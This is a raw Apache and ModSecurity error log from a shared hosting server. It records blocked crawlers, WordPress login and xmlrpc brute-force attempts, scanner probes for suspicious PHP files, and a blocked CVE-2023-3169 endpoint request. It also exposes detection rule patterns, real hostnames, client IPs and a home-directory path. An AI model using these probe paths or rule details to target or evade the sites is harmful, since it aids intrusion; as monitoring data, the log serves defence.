[Tue May 26 17:36:30.406494 2026] [security2:error] [pid 891273:tid 891430] [client 185.191.171.14:31268] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/day/2022-12-19/"] [unique_id "ahWMxsDEzZ8z3jtDm825YwAAABs"]
[Tue May 26 17:36:30.406654 2026] [security2:error] [pid 891273:tid 891430] [client 185.191.171.14:31268] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-december/day/2022-12-19/"] [unique_id "ahWMxsDEzZ8z3jtDm825YwAAABs"]
[Tue May 26 17:36:31.271264 2026] [security2:error] [pid 891273:tid 891487] [client 15.235.98.67:28724] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "consola.co"] [uri "/"] [unique_id "ahWMx8DEzZ8z3jtDm825iQAAAFQ"]
[Tue May 26 17:36:31.271369 2026] [security2:error] [pid 891273:tid 891487] [client 15.235.98.67:28724] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "consola.co"] [uri "/"] [unique_id "ahWMx8DEzZ8z3jtDm825iQAAAFQ"]
[Tue May 26 17:36:32.486537 2026] [security2:error] [pid 894579:tid 894759] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMyAEtZWuWWBGzl__utAAAATs"]
[Tue May 26 17:36:35.116161 2026] [security2:error] [pid 894579:tid 894724] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMygEtZWuWWBGzl__u9gAAARg"]
[Tue May 26 17:36:36.939633 2026] [security2:error] [pid 894579:tid 894833] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMzAEtZWuWWBGzl__vJQAAAYQ"]
[Tue May 26 17:36:39.228875 2026] [security2:error] [pid 891273:tid 891428] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMzsDEzZ8z3jtDm826bgAAABk"]
[Tue May 26 17:36:40.470360 2026] [security2:error] [pid 894579:tid 894731] [client 223.235.98.214:24891] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM0AEtZWuWWBGzl__vkgAAAR8"]
[Tue May 26 17:36:40.470469 2026] [security2:error] [pid 894579:tid 894731] [client 223.235.98.214:24891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM0AEtZWuWWBGzl__vkgAAAR8"]
[Tue May 26 17:36:41.725346 2026] [security2:error] [pid 894579:tid 894748] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM0QEtZWuWWBGzl__vsQAAATA"]
[Tue May 26 17:36:43.860420 2026] [security2:error] [pid 894579:tid 894745] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM0wEtZWuWWBGzl__v7AAAAS0"]
[Tue May 26 17:36:46.384612 2026] [security2:error] [pid 891273:tid 891524] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM1cDEzZ8z3jtDm827NwAAAHk"]
[Tue May 26 17:36:47.996850 2026] [security2:error] [pid 891273:tid 891523] [client 147.53.122.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWM18DEzZ8z3jtDm827dQAAAHg"], referer: https://www.anujtradingco.com/
[Tue May 26 17:36:48.684886 2026] [security2:error] [pid 891273:tid 891493] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM2MDEzZ8z3jtDm827fwAAAFo"]
[Tue May 26 17:36:49.579507 2026] [security2:error] [pid 891273:tid 891424] [client 147.53.122.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWM2cDEzZ8z3jtDm827ugAAABU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 17:36:50.496676 2026] [security2:error] [pid 894579:tid 894823] [client 87.106.152.203:54898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.senoro.com.mx"] [uri "/images/images/cache.php"] [unique_id "ahWM2gEtZWuWWBGzl__wkgAAAXo"], referer: www.google.com
[Tue May 26 17:36:50.900641 2026] [security2:error] [pid 891273:tid 891475] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM2sDEzZ8z3jtDm8274QAAAEg"]
[Tue May 26 17:36:50.910589 2026] [security2:error] [pid 894579:tid 894835] [client 223.235.98.214:2041] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM2gEtZWuWWBGzl__wqAAAAYY"]
[Tue May 26 17:36:50.910846 2026] [security2:error] [pid 894579:tid 894835] [client 223.235.98.214:2041] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM2gEtZWuWWBGzl__wqAAAAYY"]
[Tue May 26 17:36:51.372849 2026] [core:crit] [pid 891273:tid 891447] (13)Permission denied: [client 40.77.167.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:36:51.960301 2026] [core:crit] [pid 894579:tid 894833] (13)Permission denied: [client 40.77.167.13:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 17:36:52.358881 2026] [security2:error] [pid 891273:tid 891369] [remote 141.95.202.18:35788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWM3MDEzZ8z3jtDm828EAAAG18"]
[Tue May 26 17:36:52.805956 2026] [security2:error] [pid 891273:tid 891417] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM3MDEzZ8z3jtDm828FwAAAA4"]
[Tue May 26 17:36:52.820705 2026] [security2:error] [pid 891273:tid 891367] [remote 5.78.119.122:56662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWM3MDEzZ8z3jtDm828IgAAcF0"]
[Tue May 26 17:36:52.901948 2026] [security2:error] [pid 894579:tid 894770] [client 43.157.56.91:58384] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "162.222.227.191"] [uri "/"] [unique_id "ahWM3AEtZWuWWBGzl__w5AAAAUU"]
[Tue May 26 17:36:53.106484 2026] [security2:error] [pid 891273:tid 891480] [client 79.140.115.107:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM3MDEzZ8z3jtDm828IwAAAE0"]
[Tue May 26 17:36:55.201905 2026] [security2:error] [pid 891273:tid 891455] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM3sDEzZ8z3jtDm828cQAAADQ"]
[Tue May 26 17:36:57.253946 2026] [security2:error] [pid 894579:tid 894806] [client 94.26.106.56:59336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcalendars.whitesun.in"] [uri "/wp-login.php"] [unique_id "ahWM4QEtZWuWWBGzl__xVgAAAWk"], referer: https://www.google.com/
[Tue May 26 17:36:57.570032 2026] [security2:error] [pid 894579:tid 894836] [client 94.26.106.56:53774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcalendars.whitesun.in"] [uri "/wp-login.php"] [unique_id "ahWM4QEtZWuWWBGzl__xcgAAAYc"]
[Tue May 26 17:36:57.913046 2026] [security2:error] [pid 894579:tid 894832] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM4QEtZWuWWBGzl__xaAAAAYM"]
[Tue May 26 17:36:58.051032 2026] [proxy:error] [pid 894579:tid 894727] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:36:58.051075 2026] [proxy_http:error] [pid 894579:tid 894727] [client 94.26.106.56:53588] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:36:58.051643 2026] [proxy:error] [pid 894579:tid 894727] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:36:58.051672 2026] [proxy_http:error] [pid 894579:tid 894727] [client 94.26.106.56:53588] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:36:58.123955 2026] [security2:error] [pid 894579:tid 894771] [client 138.16.177.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "hassina-foundation.com"] [uri "/index.php"] [unique_id "ahWM4AEtZWuWWBGzl__xUgAAAUY"], referer: https://dseo24.monster
[Tue May 26 17:36:58.566721 2026] [security2:error] [pid 894579:tid 894798] [client 47.128.47.127:47570] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/cicodev-africa/governance-of-cicodev/steering-committee"] [unique_id "ahWM4gEtZWuWWBGzl__xmAAAAWE"]
[Tue May 26 17:37:00.298581 2026] [security2:error] [pid 894579:tid 894771] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM4wEtZWuWWBGzl__xwQAAAUY"]
[Tue May 26 17:37:00.703049 2026] [security2:error] [pid 891273:tid 891508] [client 87.106.152.203:58405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.senoro.com.mx"] [uri "/images/images/cache.php"] [unique_id "ahWM5MDEzZ8z3jtDm828-gAAAGk"], referer: www.google.com
[Tue May 26 17:37:01.384730 2026] [security2:error] [pid 891273:tid 891474] [client 223.235.98.214:24146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM5cDEzZ8z3jtDm829HQAAAEc"]
[Tue May 26 17:37:01.384915 2026] [security2:error] [pid 891273:tid 891474] [client 223.235.98.214:24146] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM5cDEzZ8z3jtDm829HQAAAEc"]
[Tue May 26 17:37:01.860546 2026] [security2:error] [pid 891273:tid 891442] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWM5cDEzZ8z3jtDm829OwAAACc"], referer: https://anujtradingco.com/top-deejay-headphones/
[Tue May 26 17:37:02.115481 2026] [security2:error] [pid 891273:tid 891443] [client 114.119.131.93:59593] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/prespontaneousefdf/dbabcb2042696.shtml"] [unique_id "ahWM5sDEzZ8z3jtDm829TwAAACg"], referer: http://ghanemgh.com/prespontaneousefdf/dbabcb2042696.shtml
[Tue May 26 17:37:02.650804 2026] [security2:error] [pid 891273:tid 891418] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM5sDEzZ8z3jtDm829VQAAAA8"]
[Tue May 26 17:37:04.880875 2026] [security2:error] [pid 891273:tid 891473] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM6MDEzZ8z3jtDm8290wAAAEY"]
[Tue May 26 17:37:05.247507 2026] [security2:error] [pid 891273:tid 891377] [remote 57.141.2.63:26918] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 63.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWM6cDEzZ8z3jtDm8299QAAGmc"]
[Tue May 26 17:37:06.349322 2026] [security2:error] [pid 891273:tid 891473] [client 114.119.146.111:28403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "whitesun.in"] [uri "/1hfq/rh-negative-traits-and-characteristics.html"] [unique_id "ahWM6sDEzZ8z3jtDm82-OAAAAEY"], referer: https://whitesun.in/1hfq/rh-negative-traits-and-characteristics.html
[Tue May 26 17:37:06.722823 2026] [security2:error] [pid 891273:tid 891462] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM6sDEzZ8z3jtDm82-NQAAADs"]
[Tue May 26 17:37:09.816672 2026] [security2:error] [pid 891273:tid 891433] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM7cDEzZ8z3jtDm82-4wAAAB4"]
[Tue May 26 17:37:12.026100 2026] [security2:error] [pid 891273:tid 891458] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM78DEzZ8z3jtDm82_WwAAADc"]
[Tue May 26 17:37:12.040952 2026] [security2:error] [pid 891273:tid 891437] [client 223.235.98.214:25090] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM78DEzZ8z3jtDm82_awAAACI"]
[Tue May 26 17:37:12.041178 2026] [security2:error] [pid 891273:tid 891437] [client 223.235.98.214:25090] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM78DEzZ8z3jtDm82_awAAACI"]
[Tue May 26 17:37:13.195136 2026] [security2:error] [pid 891273:tid 891305] [remote 52.18.195.140:38890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWM8cDEzZ8z3jtDm82_rAAAQh8"]
[Tue May 26 17:37:13.754881 2026] [security2:error] [pid 891273:tid 891383] [remote 193.42.61.12:57464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWM8cDEzZ8z3jtDm82_1AAAXW0"]
[Tue May 26 17:37:14.457709 2026] [security2:error] [pid 891273:tid 891451] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM8sDEzZ8z3jtDm82_8AAAADA"]
[Tue May 26 17:37:16.616631 2026] [http2:info] [pid 912729:tid 912729] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 17:37:17.229225 2026] [security2:error] [pid 912729:tid 912883] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM9EoCupl_NMj3qz9uHAAAAJ0"]
[Tue May 26 17:37:17.848031 2026] [security2:error] [pid 912729:tid 912760] [remote 74.7.241.58:60380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWM9UoCupl_NMj3qz9ugQAAxB4"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/woocommerce/templates/order
[Tue May 26 17:37:18.991187 2026] [security2:error] [pid 912729:tid 912946] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM9koCupl_NMj3qz9uqwAAANo"]
[Tue May 26 17:37:21.327262 2026] [security2:error] [pid 912729:tid 912897] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM-EoCupl_NMj3qz9vSQAAAKk"]
[Tue May 26 17:37:22.439991 2026] [security2:error] [pid 912729:tid 912861] [client 223.235.98.214:20200] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM-koCupl_NMj3qz9vnAAAAIc"]
[Tue May 26 17:37:22.440149 2026] [security2:error] [pid 912729:tid 912861] [client 223.235.98.214:20200] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWM-koCupl_NMj3qz9vnAAAAIc"]
[Tue May 26 17:37:23.416594 2026] [security2:error] [pid 912729:tid 912983] [client 14.163.36.83:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM-koCupl_NMj3qz9vwwAAAP8"]
[Tue May 26 17:37:23.601130 2026] [security2:error] [pid 912729:tid 912899] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM-0oCupl_NMj3qz9v0gAAAKs"]
[Tue May 26 17:37:24.577132 2026] [security2:error] [pid 912729:tid 912970] [client 89.248.172.183:62482] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-json/tdw/save_css" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1565"] [id "900931"] [msg "CVE-2023-3169 Tag Div exploit"] [hostname "preetishah.com"] [uri "/wp-json/tdw/save_css"] [unique_id "ahWM_EoCupl_NMj3qz9wHQAAAPI"]
[Tue May 26 17:37:25.584956 2026] [security2:error] [pid 912729:tid 912874] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM_UoCupl_NMj3qz9wPQAAAJQ"]
[Tue May 26 17:37:28.454546 2026] [security2:error] [pid 912729:tid 912892] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWM_0oCupl_NMj3qz9w2gAAAKU"]
